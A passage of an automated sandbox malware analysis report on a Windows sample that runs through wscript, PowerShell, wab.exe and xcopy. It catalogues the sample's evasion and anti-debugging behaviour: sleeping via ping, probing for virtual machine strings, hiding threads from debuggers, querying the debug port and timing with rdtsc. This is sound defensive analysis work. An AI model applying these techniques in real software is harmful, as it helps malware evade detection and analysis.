        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Uses ping.exe to sleep
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1Jump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D1C0 rdtsc 22_2_0395D1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4992Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4925Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8086Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1703Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 966Jump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeAPI coverage: 3.0 %
        Source: C:\Windows\System32\wscript.exe TID: 4256Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep count: 8086 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 1703 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6648Thread sleep count: 966 > 30Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
        Source: C:\Windows\System32\cmd.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F4B7A0 FindFirstFileW,FindNextFileW,FindClose,22_2_02F4B7A0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wab.exe, 0000001B.00000002.3468143116.0000000000D68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000002.2228998163.0000022CC0BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000003.2183688264.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2225913246.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2229406049.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2183592062.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
        Source: wscript.exe, 00000000.00000003.2183808324.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2226248276.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2182822284.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2223236655.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2229181627.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000008.00000002.3550837263.000001EF41514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Hides threads from debuggers
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0395D1C0 rdtsc 22_2_0395D1C0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0300D508 LdrInitializeThunk,LdrInitializeThunk,11_2_0300D508
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897F498 mov eax, dword ptr fs:[00000030h]17_3_0897F498
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_089788FA mov eax, dword ptr fs:[00000030h]17_3_089788FA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08978A5A mov eax, dword ptr fs:[00000030h]17_3_08978A5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984462 mov eax, dword ptr fs:[00000030h]17_3_08984462
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984108 mov eax, dword ptr fs:[00000030h]17_3_08984108
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08978700 mov eax, dword ptr fs:[00000030h]17_3_08978700
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984302 mov eax, dword ptr fs:[00000030h]17_3_08984302
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984538 mov eax, dword ptr fs:[00000030h]17_3_08984538
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08978B30 mov eax, dword ptr fs:[00000030h]17_3_08978B30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897FD38 mov eax, dword ptr fs:[00000030h]17_3_0897FD38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897FD38 mov eax, dword ptr fs:[00000030h]17_3_0897FD38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897FD38 mov eax, dword ptr fs:[00000030h]17_3_0897FD38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897FD38 mov eax, dword ptr fs:[00000030h]17_3_0897FD38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08984578 mov eax, dword ptr fs:[00000030h]17_3_08984578
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08978B70 mov eax, dword ptr fs:[00000030h]17_3_08978B70
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DE388 mov eax, dword ptr fs:[00000030h]22_2_038DE388
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DE388 mov eax, dword ptr fs:[00000030h]22_2_038DE388
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DE388 mov eax, dword ptr fs:[00000030h]22_2_038DE388
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B539D mov eax, dword ptr fs:[00000030h]22_2_039B539D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0393739A mov eax, dword ptr fs:[00000030h]22_2_0393739A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0393739A mov eax, dword ptr fs:[00000030h]22_2_0393739A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D8397 mov eax, dword ptr fs:[00000030h]22_2_038D8397
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D8397 mov eax, dword ptr fs:[00000030h]22_2_038D8397
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D8397 mov eax, dword ptr fs:[00000030h]22_2_038D8397
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390438F mov eax, dword ptr fs:[00000030h]22_2_0390438F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390438F mov eax, dword ptr fs:[00000030h]22_2_0390438F
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039133A0 mov eax, dword ptr fs:[00000030h]22_2_039133A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039133A0 mov eax, dword ptr fs:[00000030h]22_2_039133A0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039033A5 mov eax, dword ptr fs:[00000030h]22_2_039033A5
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399B3D0 mov ecx, dword ptr fs:[00000030h]22_2_0399B3D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EA3C0 mov eax, dword ptr fs:[00000030h]22_2_038EA3C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E83C0 mov eax, dword ptr fs:[00000030h]22_2_038E83C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E83C0 mov eax, dword ptr fs:[00000030h]22_2_038E83C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E83C0 mov eax, dword ptr fs:[00000030h]22_2_038E83C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E83C0 mov eax, dword ptr fs:[00000030h]22_2_038E83C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399C3CD mov eax, dword ptr fs:[00000030h]22_2_0399C3CD
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039663C0 mov eax, dword ptr fs:[00000030h]22_2_039663C0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F03E9 mov eax, dword ptr fs:[00000030h]22_2_038F03E9
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B53FC mov eax, dword ptr fs:[00000030h]22_2_039B53FC
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039163FF mov eax, dword ptr fs:[00000030h]22_2_039163FF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE3F0 mov eax, dword ptr fs:[00000030h]22_2_038FE3F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE3F0 mov eax, dword ptr fs:[00000030h]22_2_038FE3F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FE3F0 mov eax, dword ptr fs:[00000030h]22_2_038FE3F0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0399F3E6 mov eax, dword ptr fs:[00000030h]22_2_0399F3E6
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03900310 mov ecx, dword ptr fs:[00000030h]22_2_03900310
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A30B mov eax, dword ptr fs:[00000030h]22_2_0391A30B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A30B mov eax, dword ptr fs:[00000030h]22_2_0391A30B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0391A30B mov eax, dword ptr fs:[00000030h]22_2_0391A30B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DC310 mov ecx, dword ptr fs:[00000030h]22_2_038DC310
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396930B mov eax, dword ptr fs:[00000030h]22_2_0396930B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396930B mov eax, dword ptr fs:[00000030h]22_2_0396930B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396930B mov eax, dword ptr fs:[00000030h]22_2_0396930B
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A132D mov eax, dword ptr fs:[00000030h]22_2_039A132D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A132D mov eax, dword ptr fs:[00000030h]22_2_039A132D
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390F32A mov eax, dword ptr fs:[00000030h]22_2_0390F32A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D7330 mov eax, dword ptr fs:[00000030h]22_2_038D7330
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD34C mov eax, dword ptr fs:[00000030h]22_2_038DD34C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038DD34C mov eax, dword ptr fs:[00000030h]22_2_038DD34C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AA352 mov eax, dword ptr fs:[00000030h]22_2_039AA352
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov ecx, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0396035C mov eax, dword ptr fs:[00000030h]22_2_0396035C
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039B5341 mov eax, dword ptr fs:[00000030h]22_2_039B5341
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9353 mov eax, dword ptr fs:[00000030h]22_2_038D9353
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038D9353 mov eax, dword ptr fs:[00000030h]22_2_038D9353
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03962349 mov eax, dword ptr fs:[00000030h]22_2_03962349
